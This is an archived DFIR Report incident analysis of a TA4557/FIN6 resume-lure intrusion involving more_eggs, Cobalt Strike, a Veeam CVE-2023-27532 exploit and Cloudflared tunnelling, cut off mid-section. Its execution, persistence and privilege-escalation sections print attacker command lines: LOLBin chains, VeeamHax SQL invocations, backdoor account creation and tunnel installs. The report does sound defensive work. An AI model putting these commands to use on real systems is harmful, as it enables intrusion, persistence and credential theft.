{
	"id": "37b456fb-f01a-4f3a-b24a-d6506d6995ff",
	"created_at": "2026-04-06T00:17:07.145637Z",
	"updated_at": "2026-04-10T03:36:08.267193Z",
	"deleted_at": null,
	"sha1_hash": "b2fcc8df93282696196d20c2c84266dcaf293c35",
	"title": "The Curious Case of an Egg-Cellent Resume - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6870796,
	"plain_text": "The Curious Case of an Egg-Cellent Resume - The DFIR Report\r\nBy editor\r\nPublished: 2024-12-02 · Archived: 2026-04-05 20:07:17 UTC\r\nKey Takeaways\r\nInitial access was via a resume lure as part of a TA4557/FIN6 campaign.\r\nThe threat actor abused LOLbins like ie4uinit.exe and msxsl.exe to run the more_eggs malware.\r\nCobalt Strike and python-based C2 Pyramid were employed by the threat actor for post-exploitation activity.\r\nThe threat actor abused CVE-2023-27532 to exploit a Veeam server and facilitate lateral movement and privilege\r\nescalation activities.\r\nThe threat actor installed Cloudflared to assist in tunneling RDP traffic.\r\nThis case was first published as a Private Threat Brief for customers in April of 2024.\r\nEight new rules were created from this report and added to our Private Detection Ruleset.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon. \r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights\r\nreports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 150+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. 
Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nTable of Contents:\r\nCase Summary\r\nServices\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCommand and Control\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 1 of 38\n\nIn March 2024, an investigation took place after malicious activity was detected. Upon analysis, it was identified that a\r\nthreat actor was able to infect and pivot from a user endpoint to two servers in the environment.\r\nThe threat actor was able to gain access by submitting a job application that pointed to a resume lure. This initial access\r\ncampaign was observed by Proofpoint who attribute it to the group they track as TA4557. This group has historically\r\noverlapped with FIN6 activity, and has tooling overlaps with Cobalt Group and Evilnum.\r\nAfter being directed to an online resume site from the job posting notice, the victim downloaded the fake resume zip and\r\nexecuted the malicious .lnk file within the zip. This started an execution flow with the threat actor using the ie4uinit.exe\r\nMicrosoft executable to side-load a malicious .inf file. After that, the process dropped a malicious DLL which was executed\r\nusing WMI. This then created a scheduled task, followed by another WMI process to load malicious JScript using the\r\nmsxsl.exe Microsoft binary. This was the final more_eggs payload that established beacon activity to the command and\r\ncontrol server.\r\nSome initial discovery commands were then run using Microsoft binaries like nltest, net, and whoami. Activity mostly\r\nceased until approximately one and a half days later when Cobalt Strike was dropped on the beachhead. 
First we observed\r\nthe threat actor create shadow copies using vssadmin, which we assess was likely for trying to access credentials. This was\r\nfollowed up with some initial discovery using Microsoft utilities and the creation of a new user on the system.\r\nThe threat actor then used SharpShares and Seatbelt to further enumerate the host and the environment. The threat actor then\r\nattempted to deploy Pyramid on the beachhead, and while it was executed after much trouble, we observed little action from\r\nit or communication to its command and control server. After Pyramid, the threat actor began looking for lateral movement\r\noptions. They decided to target a backup server running Veeam software. They were able to exploit the vulnerability, CVE-2023-27532, on the server and used the access to create a new local administrator account.\r\nUsing the new account on the backup server they used RDP to connect from the beachhead. During this and later RDP\r\npivoting activity, the threat actor leaked several host names that tie to other intrusions that ended with a Fog ransomware\r\ndeployment, as reported by Arctic Wolf. On the backup server the threat actor deployed their Cobalt Strike payload and\r\ncontinued discovery activity with more SharpShares and Seatbelt activity and then AdFind. At this time, on the backup\r\nserver, LSASS memory was accessed for credentials.\r\nFollowing this, the threat actor targeted a second server and this time used a remote service to replicate the creation of a new\r\nlocal administrator account on this second server. This service was created using a domain administrator account indicating\r\nthe previous LSASS access was successful. 
The threat actor then checked various privileged users in the environment before\r\nlocating a disabled domain administrator account that they re-enabled.\r\nOn the backup server, the threat actor then used the browser to access the file sharing site temp.sh to download a zip file\r\ncontaining a Cloudflared installer. The MSI installer in the zip was then run and Cloudflared was installed as a service on the\r\nserver. They then connected to the second server using RDP and repeated the install process there. On this server, they then\r\ncreated another new user and added them to the local administrator group.\r\nThe threat actor then started a new RDP session with the new user and then dropped and executed SoftPerfect Network\r\nScanner. After the scan, the threat actor opened a few files from a remote file share and then activity ceased for the day.\r\nThe following day the threat actor returned, pinging a host on a remote network. After this, they then removed the\r\nmore_eggs files and persistence task on the beachhead and beaconing to more_eggs command and control ceased. The\r\nCobalt Strike and Cloudflared tunnels remained active but no further activity was observed before the threat actor was\r\nevicted.\r\nFurther open-source investigation into the fake resume campaign identified numerous other lure sites with the same\r\ntemplates and images following the same \u003cname\u003e.com format.\r\nThis campaign is still ongoing with minimal changes to the lure websites or malware deployment observed. A list of\r\ndomains identified is included in the indicators section of the report.\r\nWhile the more_eggs malware and fake resume lures have been used by TA4557/FIN6 as early as 2018, this specific\r\ncampaign appeared to have been established in late 2023. 
Below includes some previous analysis on the same campaign:\r\nProofpoint\r\nTrend Micro\r\neSentire\r\nCritical Start\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by @_pete_0, Zach Stanford (aka @svch0st), and guest contributor Kelsey Merriman\r\n(aka @k3dg3) from Proofpoint\r\nInitial Access\r\nProofpoint has been tracking TA4557 since 2018 as a skilled, financially motivated threat actor known to distribute the\r\nexclusive more_eggs backdoor, which can profile the endpoint and send additional payloads. TA4557 notably differs from\r\nother priority threat actors due to the unique tool and malware usage, campaign targeting, job candidate-themed lures,\r\nsophisticated evasive measures, distinct attack chains, and notable infrastructure patterns.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 3 of 38\n\nThroughout 2024, Proofpoint has observed TA4557 use multiple delivery approaches when targeting employees involved in\r\nthe hiring process, including:\r\nSending emails directly to employees containing instructions guiding the recipient to navigate to a resume-themed\r\nwebsite that ultimately leads to malware delivery. The actor used various methods to prevent security tools from\r\nrecognizing the domain in the email body, seemingly to avoid automated analysis. Examples include leaving a space\r\nor underscore before the TLD in the email body.\r\nSending benign emails directly to employees, waiting for a response, then replying with an email containing\r\ninstructions guiding the recipient to navigate to a resume-themed website that ultimately leads to malware delivery\r\nmasquerading as a fake candidate and applying to legitimate job postings on various employment websites. 
The actor\r\ntypically uploaded a resume to the job application containing instructions that guided users to a fake candidate web\r\npage.\r\nIn March 2024, Proofpoint observed the use of the third approach in an email from a job board notifying a user that a\r\nnew candidate (TA4557) had applied to the user’s open job posting. Our intrusion files and lure site matched this\r\ncampaign.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 4 of 38\n\nIn our intrusion, we were able to identify the origin of the malicious payload that was executed by parsing the user’s Edge\r\nSQLite databases.\r\nThe user downloaded John Shimkus.zip from the domain johnshimkus[.]com. The site had a captcha when the Download\r\nCV button was clicked and regenerates a unique download URL when we attempted to analyze the site further.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 5 of 38\n\nWhen visited from a Linux User Agent, the site returns a basic text resume instead of the download link in an attempt to\r\navoid analysis.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 6 of 38\n\nThe same website template and stock image was used in a TA4557 campaign that Proofpoint covered below:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 7 of 38\n\nExecution\r\nOnce the victim uncompressed the zip, they clicked the Windows Shortcut file John-_Shimkus.lnk which executed the\r\ninfection flow.\r\nOf note, the image 2.jpg that was alongside the payload in the .zip was not used by the malware. 
We assess that it was likely\r\nused to “pad” the zip in order to decrease detection potential.\r\nUpon execution of the Windows Shortcut, there were several steps of execution that are discussed further below.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 8 of 38\n\nStarting with the .lnk , we were able to parse the file which revealed a long, obfuscated argument.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 9 of 38\n\nAfter decoding the cmd.exe argument, it becomes the following command, which outputs text to the ieuinit.inf file:\r\n(for %%a in (\"[089F]\" \"sc\\\" \"ro%%Clarify%%j,NI,%%Serious%%%%Departments%%%%Departments%%p%%Jaguar%%%%Groups%%%\r\nAnd then moves a legitimate copy of the binary, ie4uinit.exe, to a custom location while also setting some additional\r\nenvironment variables.\r\ncall xcopy /Y /C /Q %%windir%%\\system32\\ie4uinit.exe \"%%appdata%%\\microsoft\\*\" | set Pupils59=Seats \u0026\u0026 start \"\r\nThis section of commands appeared as follows in the process activity on the beachhead host:\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" call xcopy /Y /C /Q %%windir%%\\system32\\ie4uinit.exe \"%APPDATA%\\microsoft\\\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" set Pupils59=Seats \"\r\nxcopy /Y /C /Q %WINDIR%\\system32\\ie4uinit.exe \"%APPDATA%\\microsoft\\*\"\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" start \"\" wmic process call create \"%APPDATA%\\microsoft\\ie4uinit.exe -bases\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" set \"Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Y\r\nQuote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Su\r\nDisabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spik\r\nwmic process call create \"%APPDATA%\\microsoft\\ie4uinit.exe -basesettings\"\r\n%APPDATA%\\microsoft\\ie4uinit.exe -basesetting\r\nAbusing 
ie4uinit.exe (LOLBin)\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 10 of 38\n\nThe flow uses a documented execution hijack of IE4uinit.exe (https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/). By\r\nsupplying a “side-loaded” .inf file to IE4uinit.exe, it can be used to load and execute COM scriptlets (SCT) from remote\r\nservers. In this case it was observed to reach out to the URL:\r\nhxxp://a92837f.johnshimkus[.]com/setthevar\r\nThis was visible from the host via a DNS lookup by the ie4uinit.exe process:\r\nAnd with a Suricata rule:\r\nWe can also use Prefetch to confirm that ie4uinit.exe interacted with the malicious ieuinit.inf:\r\nMore_Eggs\r\nShortly after the execution of ie4uinit.exe, the DLL 20350.dll was dropped in the AppData folder. The process wmiprvse.exe\r\nthen spawned the following command:\r\nregsvr32 /s /n /i:Action \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Microsoft\\20350.dll\"\r\nThis DLL created .txt files as well as the legitimate MSXSL executable that were used in the next stage of execution:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 11 of 38\n\nC:\\ProgramData\\Microsoft\\51D7701F6EB775C7.txt (XML - Schtask)\r\nC:\\ProgramData\\Microsoft\\29D88F75006BE8A.txt (XML - more_eggs script)\r\nC:\\ProgramData\\Microsoft\\178F2E426.txt\r\nC:\\ProgramData\\Microsoft\\msxsl.exe (Legitimate Binary)\r\nThe chain then used schtasks to setup persistence for the more_eggs malware.\r\nschtasks /Create /TN \"8766714F94DD\" /XML \"C:\\ProgramData\\Microsoft\\51D7701F6EB775C7.txt\"\r\nAbusing msxsl.exe to deploy more_eggs\r\nThe more_eggs payload was finally loaded using the msxsl.exe binary using the documented technique – https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ :\r\nC:\\ProgramData\\Microsoft\\msxsl.exe 29D88F75006BE8A.txt 29D88F75006BE8A.txt\r\nThe file provided to msxsl.exe, 29D88F75006BE8A.txt, was an obfuscated JScript to 
load the more_eggs malware.\r\nAfter executing, the more_eggs malware consistently ran the command:\r\ntypeperf.exe \"\\System\\Processor Queue Length\" -si 180 -sc 1\r\nTypeperf is a Microsoft utility that is used to collect performance data from a specified counter. In this case the Processor Queue\r\nLength counter reports the number of threads waiting in the processor queue. The -si parameter indicates the sample interval in seconds (180 seconds, or 3 minutes), and -sc\r\nindicates the number of samples collected.\r\nThe pattern generated approximately 20 new process creation events per hour throughout the duration of the intrusion. This\r\nwas based on the parameter of 180 seconds: 60 minutes (hour) / 3 minutes (180 seconds) = 20 processes.\r\nMore than one and a half days after initial infection, the threat actor deployed a Cobalt Strike Beacon using regsvr32.exe:\r\nregsvr32.exe /s /n /i \"C:\\ProgramData\\31765.ocx\"\r\nThe .OCX file was an unsigned DLL file, with a size of 230KB.\r\nPersistence\r\nmore_eggs\r\nDuring the initial more_eggs execution a scheduled task command was run:\r\nschtasks /Create /TN \"8766714F94DD\" /XML \"C:\\ProgramData\\Microsoft\\51D7701F6EB775C7.txt\"\r\nThe schtasks command was run with the /XML flag pointing to a text file dropped by the threat actor. According to\r\nthe Microsoft documentation, this flag:\r\nCreates a task specified in the XML file. Can be combined with the /ru and /rp parameters, or with\r\nthe /rp parameter by itself if the XML file already contains the user account information.\r\nSo while using a text extension, the file was a ready-made task for persistence. 
The task itself used a Boot Trigger to restart\r\nthe malware after restart activity on the host.\r\nThe command arguments in the task pointed to a file on disk 178F2E426.txt containing:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 13 of 38\n\nWhen decoded we can see the script would result in the execution of msxsl.exe and the more_eggs script files disguised as\r\ntext files.\r\nCloudflared\r\nOn a backup server the threat actor downloaded a zip file named cloudflared.zip from the temp.sh file sharing site using\r\nInternet Explorer. We can see the internet explorer process write the file and extract the download url from the\r\nWebCacheV01.dat file for the user.\r\nThe threat actor then installed the tool Cloudflared through the MSI installer on two hosts in the environment. Cloudflared is\r\na tool that can be used to tunnel traffic through Cloudflare’s services. This allows the threat actor to proxy access to the\r\nprivate network through the tunnel.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 14 of 38\n\n\"C:\\Windows\\System32\\msiexec.exe\" /i \"C:\\ProgramData\\cloudflared\\cloudflared-windows-amd64.msi\"\r\nServer Command Line Decoded Config (Redacted with Example Text)\r\nBackup\r\nServer\r\ncloudflared-windows-amd64.exe\r\nservice install\r\neyJ\u003cREDACTED\u003eJ9\r\n{“a”:”ddce269a1e3d054cae349621c198dd52″,”t”:”e8c8cb73-248f-4b39-9cf9-\r\nc6fb3b89edb9″,”s”:”AMYNzTjTCQQtlLE5j0ZY4zDYMwxj2wAMZTzQYUOjYZzMh0ty\r\nAn app\r\nserver\r\ncloudflared.exe\r\nservice install\r\neyJ\u003cREDACTED\u003eJ9\r\n{“a”:”ddce269a1e3d054cae349621c198dd52″,”t”:”35575e50-eae2-4d40-bcee-5a1986b0df1e”,”s”:”TYWmL3jYjMZMAwN3NMZBU3iMEMZ0mTJztgNhEW1jODMTG\r\nThe MSI and subsequent command would install the service (System EID 7045) as Cloudflared agent with the start type of\r\nauto start. 
This would allow persistent access through the tunnel established by the agent.\r\nInstallation of the CloudFlared results in Cloudflared Windows Events being logged in the Application log. The events\r\nindicating the Cloudflared service starting and the tunnel being established were recorded as Event ID 1 – Cloudflared.\r\nFollowed by tunnel establishment:\r\nCreate Accounts\r\nDuring the intrusion the threat actor created four different user accounts. Three were local users and added to the host’s local\r\nAdministrators group with a final user account being added to the domain and domain Administrators group. All of the users\r\nwere added using net.exe but the commands were initiated via a variety of ways including local command shells, application\r\nexploits, and remote services.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 15 of 38\n\nUser names observed during the intrusion:\r\nUser Scope Host Execution Method\r\nbackup local beachhead Local cmd spawned from Cobalt Strike\r\nsqlbackup local backup server exploit\r\nsqlbackup local management server Remote service\r\nadm_1 domain management server Cmd spawned from interactive RDP session\r\nPrivilege Escalation\r\n The threat actor then used a modified version of VeeamHax (https://github.com/sfewer-r7/CVE-2023-27532). This tool\r\nexploited CVE-2023-27532. Below is a side by side of the decompiled version we observed and the source. The main\r\nchanges were to allow arbitrary SQL commands to be supplied as an argument evaluated on the Veeam target.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 16 of 38\n\nThe –cmd argument gets executed through a hard coded xp_cmdshell command. 
As seen below, the threat actor stuck to\r\nusing the default value in the original version of the VeeamHax exploit – c:\\windows\\notepad.exe.\r\nThis ended up being executed on the target SQL server but did not serve any purpose to their goals. The notepad process was\r\nused for Proof of Concept purposes. In this execution context, Notepad.exe is considered a harmless process that does not\r\nlead to any malicious activity. The –sql argument was the custom addition to the script that would allow arbitrary SQL\r\ncommands to be passed to the exploit.\r\nThe threat actor ran the following commands using their custom version of VeeamHax.exe to enable xp_cmdshell before\r\ncreating a local administrator named sqlbackup with the password of Password!1221!.\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"select @@ver\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC sp_conf\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"RECONFIGURE\"\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC sp_conf\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"RECONFIGURE\"\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC master\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC master\r\nThe VeeamHax.exe binary included the developers Program Database (PDB) string as:\r\nE:\\Developer\\yahtochka\\2\\CVE-2023-27532\\obj\\Release\\VeeamHax.pdb\r\nFrom the backup server we observed the net commands executed by the MSSQL process.\r\n\"%WINDIR%\\system32\\cmd.exe\" /c net user sqlbackup Password!1221! 
/add\r\n\"%WINDIR%\\system32\\cmd.exe\" /c net localgroup administrators sqlbackup /add\r\nThe Security event log recorded the local account creation in Event ID 4720:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 17 of 38\n\nSQL Server associated Windows Application Event IDs for xp_cmdshell enable, followed by cmd execution are indicated by\r\ntwo event IDs 15457 in quick succession:\r\nFirst event relates to enabling xp_cmdshell:\r\nFollowed by the xp_cmdshell execution:\r\nPayload Failures\r\nWhile the VeeamHax.exe process executed successfully, the process was observed terminating in the Windows Application\r\nEvent Log under Event ID 1000 (Provider: Application Error). This indicates that the exploit didn’t safely handle exception\r\nerrors, resulting in an application crash.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 18 of 38\n\nWith an associated ‘.Net Runtime’ error:\r\nThe attacker was observed executing the process on several occasions, each time several application error events were\r\nobserved. Resulting in associated Windows Error Reporting Event ID 1001 (Provider: Windows Error Reporting) being\r\ngenerated.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 19 of 38\n\nA WerFault process invoked by an application indicates that the application terminated unexpectedly. There were multiple\r\nexploit attempts by the threat actor in a short time frame.\r\nDefense Evasion\r\nThe threat actor removed files and artifacts from hosts throughout the intrusion. For example the more_eggs payload deleted\r\nits own DLL after execution.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 20 of 38\n\nThis behavior continued throughout the intrusion.\r\nDuring the intrusion, after the threat actor pivoted to a backup server we observed a log event for Windows Defender being\r\ndisabled. 
We observed no process event tied to this so we assess that this action was performed by the threat actor in the GUI\r\nwith their RDP session.\r\nNamed pipes\r\nFrom the Cobalt Strike regsvr32 process we observed usage of default Cobalt Strike named pipes.\r\nPipes observed:\r\n\\postex_18ab\r\n\\postex_77cb\r\nCredential Access\r\nDuring the RDP session on the backup server, the threat actor opened powershell_ise.exe and ran the script Veeam-Get-Creds.ps1 (https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1).\r\nThe PowerShell operational log with event ID 4103 and 4104 tracked the output of the script which highlighted they\r\nsuccessfully extracted an Administrator password from the Veeam database.\r\nThe LSASS process on the backup server was accessed via the RunDll32 (Cobalt Strike) beacon using a well-known\r\nGranted Access pattern of 0x1010 – PROCESS_QUERY_LIMITED_INFORMATION (0x1000) \u0026 PROCESS_VM_READ\r\n(0x0010).\r\nThe RunDll32 process was also observed interacting with other processes such as cmd.exe and RunDll32.exe, using\r\nSYSTEM, a compromised domain administrator account and a newly created local account.\r\nSystem Recovery\r\nThe use of the Microsoft utility VSSADMIN (Volume Shadow Copy Service) was observed on the beachhead host for\r\nlisting the configured shadows and then creating a new shadow. It appears that the threat actor had trouble executing the\r\ncommand and repeated the attempt with an extra ‘cmd’ invocation.\r\nC:\\Windows\\system32\\cmd.exe /C vssadmin list shadows\r\nC:\\Windows\\system32\\cmd.exe /C vssadmin create shadow /for=C: 2\u003e\u00261\r\nC:\\Windows\\system32\\cmd.exe /C vssadmin create shadow\r\nC:\\Windows\\system32\\cmd.exe /C cmd /c vssadmin create shadow /for=C: 2\u003e\u00261\r\nWe never observed any interaction with the created shadow copy. 
It’s unclear why the threat actor initiated this command. A\r\nhypothesis to why a shadow volume would be created, would be to extract credentials via local saved stores (SAM hives for\r\nexample as this was not a Domain Controller).\r\nThere is a an identical ‘vssadmin’ command detailed on various Red Team tutorials (https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin)\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 22 of 38\n\nDiscovery\r\nInitial discovery actions started around 10 minutes after the initial execution of the malware. Standard Windows utilities\r\nwere used:\r\ncmd /v /c nltest /trusted_domains \u003e \"%TEMP%\\22041.txt\" 2\u003e\u00261\r\ncmd /v /c net group /domain \"Domain Admins\" \u003e \"%TEMP%\\51362.txt\" 2\u003e\u00261\r\ncmd /v /c whoami /upn \u003e \"%TEMP%\\26906.txt\" 2\u003e\u00261\r\nThe threat actor later used the Cobalt Strike beacon to execute numerous other discovery commands:\r\n%WINDIR%\\system32\\cmd.exe /C query session\r\n%WINDIR%\\system32\\cmd.exe /C nslookup\r\n%WINDIR%\\system32\\cmd.exe /C ping -n 1 \u003cDOMAIN\u003e\r\n%WINDIR%\\system32\\cmd.exe /C net usre REDACTED /dom\r\n%WINDIR%\\system32\\cmd.exe /C net user REDACTED /dom\r\nWe suspect the threat actor was using the execute-assembly function of the Cobalt Strike beacon as there were several\r\ninstances of rundll32.exe that had dotNet code injected into them.\r\nThe victim organization was recording certain key ETW providers which allows us to capture the threat actor loading certain\r\nmodules. 
The following was recorded, which highlighted the threat actor using the known enumeration tool Seatbelt and\r\nSharpShares.\r\nMicrosoft-Windows-DotNETRuntimeRundown {A669021C-C450-4609-A035-5AF59AF4DF18}\r\nSeatbelt\r\n\"EventID\":153\r\n\"CommandLine\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\"\r\n\"ModuleILPath\":\"Seatbelt\"\r\n\"ManagedPdbBuildPath\":\"Z:\\\\Agressor\\\\github.com-GhostPack\\\\Seatbelt-master\\\\Seatbelt\\\\obj\\\\Debug\\\\Seatbelt.pdb\r\nSharpShares\r\n\"EventID\":153\r\n\"CommandLine\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\"\r\n\"ModuleILPath\":\"SharpShares\"\r\n\"ManagedPdbBuildPath\":\"C:\\\\Users\\\\mmoser\\\\source\\\\repos\\\\SharpShares\\\\SharpShares\\\\obj\\\\Release\\\\SharpShares.p\r\nThe execution of these tools generated the files seatinfo.txt and share.txt, which the threat actor viewed on host.\r\ntype C:\\programdata\\shares.txt (A list of file shares in the network)\r\ntype c:\\programdata\\seatinfo.txt (Output of Seatbelt)\r\nInvoking SharpShares or SeatBelt (both .NET/managed applications) within an unmanaged code-based process (e.g.,\r\nRunDLL32) results in the creation of a Common Language Runtime (CLR) usage log file as a side effect.\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\rundll32.exe.log\r\nThe presence of this file for a process such as RunDLL32.exe indicates that a .Net compiled payload has been executed. 
In\r\nthis case we can correlate this activity to the execute-assembly event.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 23 of 38\n\nOnce the threat actor was able to access the backup server, they ran adfind.exe to gather further information on the domain:\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nA network check was performed with route print, followed by the creation of the file C:\\ProgramData\\scaner.zip.\r\nShortly after, from the unzipped contents, the threat actor executed the SoftPerfect Netscan tool:\r\nC:\\ProgramData\\scaner\\scaner\\netscan.exe\r\nWithin the zip content, we observed that there were other previously saved scans from at least five other victim environments.\r\nThe license file accompanying netscan.exe is seen below:\r\n\u003c?xml version=\"1.0\"?\u003e\r\n\u003cnetwork-scanner-license\u003e\r\n \u003clicense\u003eo7fOIORWqaHfRIxHI1hcovfNXqvCKPNigA+oOK8UtlSJGu342vVWzuTLsR4R0bLA9Rdh+Skt6lkYR75knjO8Uw1/5N4t9qM0CRC\r\n \u003cupgrade\u003e0\u003c/upgrade\u003e\r\n \u003clanguage\u003eEnglish\u003c/language\u003e\r\n \u003cnmap\u003e\u003c/nmap\u003e\r\n \u003cautoupdate\u003e\r\n \u003cprompt\u003efalse\u003c/prompt\u003e\r\n \u003cenabled\u003efalse\u003c/enabled\u003e\r\n \u003clastcheck\u003e0\u003c/lastcheck\u003e\r\n \u003c/autoupdate\u003e\r\n\u003c/network-scanner-license\u003e\r\nShortly after the execution of netscan.exe, we observed a sudden increase in ICMP traffic, which could be identified as a\r\nping sweep across the network. Below is a sample of network traffic that exemplifies the incremental destination IP\r\naddresses during the sweep.\r\nBy reviewing the compromised user’s Shellbags, we were able to identify the threat actor rummaging through the file shares\r\nof the network.\r\nLocal accounts were enumerated on the beachhead host, which was indicated by a number of Windows Event ID 4799 events\r\nbeing created, with the calling process being ‘Rundll32.exe’. After translating the CallerProcessID from hex to decimal, we\r\ncan correlate and confirm it as the Cobalt Strike process.\r\nLateral Movement\r\nAfter creating a local administrator account by exploiting CVE-2023-27532, the threat actor moved to a Veeam backup\r\nserver via Remote Desktop Protocol. Next, they pivoted again from the backup server to a second server in the environment\r\nusing RDP.\r\nAs they were proxying their requests through their existing malware, their workstation name was leaked in the\r\nauthentication event, revealing they were likely using Kali OS.\r\nOnce on the backup server, the threat actor ran Cobalt Strike on the host using rundll32.exe.\r\nrundll32.exe c:\\programdata\\payload_cr1.dll,DllInstall\r\nThis beacon had the same C2 details as the one used on the beachhead host.\r\nAn additional threat actor workstation name, PACKERP-VUDV41R, was leaked in the authentication logs from the backup\r\nserver.\r\nOf note, both the host names kali and PACKERP-VUDV41R were observed in the Arctic Fox article regarding a FOG\r\nransomware case, along with several tools mentioned in this report.\r\nRemote Service Creation\r\nAfter exploiting Veeam and gaining access to the backup server, the threat actor obtained credentials for a domain\r\nadministrator account. Using this account, they created a remote service on a management server and created a sqlbackup\r\nuser with the same properties as the one they created on the backup server.\r\nThis activity could be observed over the network with the Suricata rule:\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nLocally on the remote management server, Event ID 7045 events were created, followed by process events to create the user\r\naccount locally on the host.\r\nAfter performing these actions, the threat actor again used RDP to access this host.\r\nCommand and Control\r\nThe more_eggs malware generated the most command and control traffic until the threat actor deployed Cobalt\r\nStrike to the network, whose traffic volume was significantly higher. As highlighted in the graph below, the Pyramid C2 was only used\r\nonce.\r\nmore_eggs\r\nThe more_eggs payload communicated with the following command and control address:\r\nIP Port Domain\r\n108.174.197.15 443 pin.howasit[.]com\r\nThis IP address has been tracked by the DFIR Threat Intelligence Group as active from mid-March 2024 through November\r\n2024.\r\nCobalt Strike\r\nThe full beacon configuration was not recoverable; however, a partial configuration was picked up during a memory scan\r\nacross the environment:\r\n\"Server\":\"shehasgone.com\", (144.208.127[.]15)\r\n\"TargetUri\":\"/wp-includes/lu.png\",\r\n\"License\":2073085114\r\n\"Host: bing.com\"\r\n\"Connection: close\"\r\n\"Accept-Language: en-GB;q=0.9, *;q=0.7\"\r\nDomain shehasgone[.]com\r\nIP 144.208.127[.]15\r\nPort 443\r\nJA3 a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s d32d6a0ff9d52869cb6d4ab402b7306c\r\nJA4 t12d190800_d83cc789557e_16bbda4055b2\r\nJA4s t120300_c02c_52d195ce1d92\r\nThis IP and domain were only seen active during March 2024, and the DFIR Threat Intelligence Group also observed the\r\ndomain associated with the IP 109.104.152.24, although that address was not observed in this intrusion.\r\nCloudflare Tunnels\r\nCloudflared tunnels were established on two server hosts by the 